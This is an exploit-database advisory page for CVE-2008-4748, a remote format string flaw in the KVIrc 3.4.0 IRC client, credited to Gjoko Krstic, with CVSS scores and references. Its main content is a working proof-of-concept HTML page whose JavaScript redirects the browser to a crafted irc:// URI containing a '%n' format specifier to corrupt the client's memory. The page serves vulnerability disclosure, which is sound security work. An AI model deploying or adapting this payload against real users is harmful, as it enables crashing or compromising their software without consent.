Bug: KVIrc 3.4.0 Virgo Remote Format String Exploit PoC ( Ascii Version )

Search:
WLB2

KVIrc 3.4.0 Virgo Remote Format String Exploit PoC

Published
Credit
Risk
2008.10.29
Gjoko 'LiquidWorm' Krstic
High
CWE
CVE
Local
Remote
CWE-20
CVE-2008-4748
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.6/10
10/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

<!--

KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
the contribution of many IRC addicted developers around the world.

Product web page: http://www.kvirc.net/

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com

http://www.zeroscience.org

24.10.2008

-->


<html>

<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>

<head>

<body>

<center> <br /> <br /> <strong>Warning ! :)</strong> </center>

<body bgcolor="#FFFF00">

<script type="text/javascript">

alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");

function poc()
{
window.location.href = "irc://A:%n -i";
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true)
{
poc();
}

else
{
window.location.href = "http://www.kvirc.net";
}

</script> </body> </head> </html>

References:

http://www.securityfocus.com/bid/31912
http://www.milw0rm.com/exploits/6832
http://secunia.com/advisories/32410

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version